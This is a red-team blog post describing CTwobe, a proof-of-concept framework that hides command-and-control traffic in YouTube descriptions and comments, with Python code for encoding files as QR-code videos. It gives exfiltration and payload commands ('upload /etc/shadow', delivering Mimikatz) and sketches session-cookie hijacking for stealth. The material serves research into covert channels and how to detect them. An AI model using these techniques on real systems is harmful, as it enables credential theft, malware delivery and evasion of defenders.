2025-12-03

CTwobe: Hiding Command & Control in YouTube Traffic

C2Covert ChannelsPythonRed Teaming

Hiding in the Noise

As defenders get better at inspecting network traffic, the "living off the land" philosophy has extended beyond binaries to network infrastructure. Why set up a suspicious C2 domain when you can route your traffic through the most whitelisted, high-volume domain in the world: YouTube?

This is the premise behind CTwobe, a Proof-of-Concept (PoC) framework I built to demonstrate how social media APIs can be weaponized for covert communication. By tunneling commands through video descriptions and exfiltrating data via comments, CTwobe turns a standard YouTube channel into a fully functional C2 infrastructure.

The Technique: API as a Dead Drop

The core concept is simple: use YouTube as a "dead drop" for asynchronous communication.

  1. Command Channel: The Controller updates the description of a specific video with an encrypted command.
  2. Execution: The Agent (running on the target) polls this video description. When it sees a new command, it executes it.
  3. Exfiltration Channel: The Agent posts the command output as a comment on the same video.
  4. Binary Transfer: For larger files or payloads, we get creative. We encode binary data into a sequence of QR codes, render them as a video, and upload it to YouTube. The receiver downloads the video and decodes the QR frames back into the original binary.

The Architecture

I built the framework in Python for rapid prototyping, leveraging the google-api-python-client to interact with YouTube.

  • Controller (CtwobeController.py): The operator's console. It handles the OAuth flow, encrypts commands, and parses the comments to display results.
  • Target Agent (CtwobeTarget.py): The implant. It sits on the victim machine, polling for instructions and running commands.
  • QRizon (QRizon.py): The "magic" module. It handles the conversion of files to QR-video streams and back.
graph TD
    subgraph Attacker
        Controller[Controller Script]
    end

    subgraph YouTube[YouTube Infrastructure]
        Video[Video Description Commands]
        Comments[Comments Section Output]
        Uploads[Uploaded Videos Binaries]
    end

    subgraph Victim
        Agent[Target Agent]
    end

    Controller -->|Update Description| Video
    Agent -->|Poll Description| Video
    Agent -->|Post Comment| Comments
    Controller -->|Read Comments| Comments
    Agent -->|Upload QR Video| Uploads
    Controller -->|Download & Decode| Uploads

The QRizon Magic: Turning Files into Videos

This is where things get interesting. How do you exfiltrate a 5MB binary through YouTube? You can't just dump it in a comment. The answer: QRizon, a custom encoder that transforms arbitrary files into QR code video streams.

The Problem

YouTube is designed for video, not file transfer. But what if we could encode our data as video? QR codes are perfect for this:

  • They're error-correcting (YouTube's compression won't destroy the data)
  • They're visually distinct (easy to decode programmatically)
  • They can hold arbitrary binary data (after Base64 encoding)

The Dual-QR Technique

The naive approach is one QR code per frame. But that's wasteful. QRizon uses two QR codes per frame, side-by-side, effectively doubling the data density.

Each frame is 640x320 pixels:

  • Left QR: 300x300 pixels
  • Padding: 40 pixels
  • Right QR: 300x300 pixels
  • Borders: 20 pixels on all sides

At 30 FPS, this creates a smooth video that YouTube accepts without issue.

The Encoding Pipeline

Here's how a file becomes a video:

1. Read and Encode

with open(input_filepath, 'rb') as f:
    raw = f.read()
b64 = base64.b64encode(raw).decode('ascii')

We read the file as raw bytes and Base64-encode it. This ensures the binary data survives as ASCII text in the QR codes.

2. Metadata Injection

Before encoding the file data, we prepend metadata:

metadata = {"filename": file_filename, "size": file_size}
metadata_str = "QR_FILE_METADATA:" + json.dumps(metadata)

This tells the decoder what the original filename was and how many bytes to expect. The metadata is chunked separately (up to 1000 chars per QR) and placed at the start of the video.

3. Chunking

The Base64 data is split into 200-character chunks:

data_chunks = [b64[i:i+CHUNK_SIZE] for i in range(0, len(b64), CHUNK_SIZE)]

Each chunk becomes one QR code. For a 1MB file (~1.3MB Base64), that's about 6,500 QR codes or 3,250 frames at 30 FPS = ~108 seconds of video.

4. Frame Generation

For each frame, we generate two QR codes and paste them side-by-side:

for i in range(num_frames):
    frame_img = Image.new('RGB', (FRAME_WIDTH, FRAME_HEIGHT), 'white')
    # Left QR
    qr_left = qrcode.make(all_chunks[i*2])
    frame_img.paste(qr_left, (BORDER_PIXELS, BORDER_PIXELS))
    # Right QR
    if i*2 + 1 < num_qrs:
        qr_right = qrcode.make(all_chunks[i*2 + 1])
        frame_img.paste(qr_right, (BORDER_PIXELS + QR_SIZE_PIXELS + PADDING_PIXELS, BORDER_PIXELS))

5. Video Export

We use OpenCV to write the frames as an MP4:

fourcc = cv2.VideoWriter_fourcc(*'mp4v')
out = cv2.VideoWriter(output_video_path, fourcc, FRAME_RATE, (FRAME_WIDTH, FRAME_HEIGHT))

The Decoding Pipeline

On the receiving end, the process reverses:

  1. Download the video (using yt-dlp or similar)
  2. Extract frames with OpenCV
  3. Scan each frame for two QR codes using pyzbar
  4. Reconstruct the Base64 string by concatenating all decoded chunks
  5. Decode Base64 back to binary and write to disk
cap = cv2.VideoCapture(input_video_path)
while True:
    ret, frame = cap.read()
    if not ret:
        break
    # Extract left and right QR regions
    left_region = frame[BORDER_PIXELS:BORDER_PIXELS+QR_SIZE_PIXELS, 
                        BORDER_PIXELS:BORDER_PIXELS+QR_SIZE_PIXELS]
    right_region = frame[BORDER_PIXELS:BORDER_PIXELS+QR_SIZE_PIXELS,
                         BORDER_PIXELS+QR_SIZE_PIXELS+PADDING_PIXELS:...]
    # Decode QR codes
    for region in [left_region, right_region]:
        qrs = pyzbar.decode(region)
        for qr in qrs:
            data_parts.append(qr.data.decode('ascii'))
# Reconstruct file
full_b64 = ''.join(data_parts)
raw = base64.b64decode(full_b64)

Why This Works

  • YouTube's compression is lossy for video content, but QR codes are high-contrast black-and-white patterns. As long as the QR code is large enough (300x300 pixels), YouTube's H.264 encoder preserves enough detail for pyzbar to decode it.
  • Error correction: QR codes have built-in error correction. Even if a few pixels are corrupted, the data survives.
  • Scalability: This technique works for files of any size. A 10MB executable becomes a ~15-minute video. Totally reasonable for an "unlisted" upload.

Real-World Usage

In the CTwobe framework:

  • Exfiltration: upload /etc/shadow → Agent encodes the file, uploads the video, and posts the video ID as a comment.
  • Payload Delivery: Operator encodes a Mimikatz binary, uploads it to YouTube, and sends download VIDEO_ID → Agent downloads and decodes it in-memory.

Challenges and "Failures"

Building this wasn't without its headaches. Here are a few places where the reality of the API bit back:

1. The API Quota Nightmare

Google's YouTube Data API has strict daily quotas. A simple "list videos" call costs units. Polling every few seconds burns through the free tier quota in minutes.

  • The Fix: I had to dial back the polling interval to 60 seconds. This makes the C2 slow, but if the goal is evasion, then this works in our favor.

2. Comment Formatting

YouTube comments aren't raw text dumps. They have length limits and don't preserve whitespace well.

  • The Fix: I had to implement chunking and encoding (Base64) to ensure the data survived the round trip without corruption, which further ate into the API quota.

3. Latency

This is a slow channel. You issue a command, wait a minute for the agent to pick it up, then wait for the comment to post. It requires a shift in mindset from "interactive shell" to "task and wait."

The "Stealth" Upgrade: Browser Automation

While the API approach is clean, it has a major flaw: API Keys. They can be revoked, monitored, and tied to a specific developer account. Plus, the traffic looks like API calls, not user behavior.

This is where the technique can evolve from a PoC to a serious threat.

Enter Playwright

Instead of using the API, we can use Playwright or Puppeteer to drive a headless browser instance.

  1. Session Hijacking: The agent steals the legitimate user's session cookies for YouTube.
  2. Automation: The agent launches a headless browser using these cookies.
  3. Human Emulation: It navigates to the video, "watches" it (while reading the description), and "types" a comment.

Why is this dangerous?

  • No Quotas: You are just a user watching videos. There are no API limits.
  • Perfect Blending: The network traffic is indistinguishable from a user binge-watching cat videos. It's full HTTPS, loading all the standard assets, ads, and telemetry.
  • Attribution Nightmare: The traffic originates from the user's own authenticated session. To Google, it looks like the user is doing it.

Conclusion

CTwobe proves that you don't need complex custom protocols to hide your traffic. Sometimes, the best place to hide is in the loudest room on the internet. While the API-based PoC has limitations, combining this logic with browser automation creates a covert channel that is incredibly difficult to detect and block without breaking the internet for your users.

Disclaimer: This project is for educational and research purposes only. Don't use this on systems you don't own.